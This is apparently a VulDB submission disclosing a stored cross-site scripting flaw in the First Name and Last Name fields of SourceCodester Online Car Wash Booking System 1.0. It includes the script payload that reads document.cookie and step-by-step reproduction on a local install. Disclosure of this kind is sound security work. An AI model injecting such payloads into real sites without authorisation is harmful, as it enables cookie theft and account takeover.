Submit #344504: SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting
Info

Title: SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting
Description:
# Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache

Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows injecting arbitrary JavaScript in Edit in "First Name" and "Last Name".

Payload used:-
<script>confirm (document.cookie)</script>

Parameter:-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>

Steps to reproduce:-
1. Log in to your admin account.
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add a new user.
3. In the "First Name" and "Last Name" parameters put the payload: <script>confirm (document.cookie)</script>
4. As you can see, our payload has been executed.
User: Anonymous User
Submitted: 25/05/2024 15:19 (2 years ago)
Moderation: 25/05/2024 20:27 (5 hours later)
Status: Accepted
VulDB entry: 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name cross site scripting]
Points: 17
